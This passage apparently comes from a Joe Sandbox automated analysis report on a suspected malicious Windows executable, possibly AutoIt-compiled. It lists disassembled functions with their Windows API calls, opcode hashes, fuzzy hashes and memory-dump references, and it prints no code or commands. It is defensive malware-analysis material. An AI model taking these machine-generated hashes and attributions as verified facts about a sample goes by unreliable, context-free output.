                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDestroyObject$IconWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3349847261-0
                                                                                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                        Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                        • String ID:
                                                                                                        • API String ID: 2223660684-0
                                                                                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                        Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                        • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                        • EndPath.GDI32(?), ref: 00447336
                                                                                                        • StrokePath.GDI32(?), ref: 00447344
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                        • String ID:
                                                                                                        • API String ID: 2783949968-0
                                                                                                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                        Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2710830443-0
                                                                                                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                        Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 146765662-0
                                                                                                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                        Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                        • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2889604237-0
                                                                                                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                        Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                        • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2889604237-0
                                                                                                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                        Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                        • __freeptd.LIBCMT ref: 0041516B
                                                                                                        • ExitThread.KERNEL32 ref: 00415173
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 1454798553-0
                                                                                                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                        Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: Q\E
                                                                                                        • API String ID: 909875538-2189900498
                                                                                                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                        Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                        • API String ID: 2652923123-3941886329
                                                                                                        • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                        • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                        Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove_strncmp
                                                                                                        • String ID: U$\
                                                                                                        • API String ID: 2666721431-100911408
                                                                                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                        Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                        • String ID: LPT
                                                                                                        • API String ID: 3035604524-1350329615
                                                                                                        • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                        • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                        Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \$h
                                                                                                        • API String ID: 4104443479-677774858
                                                                                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                        Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memcmp
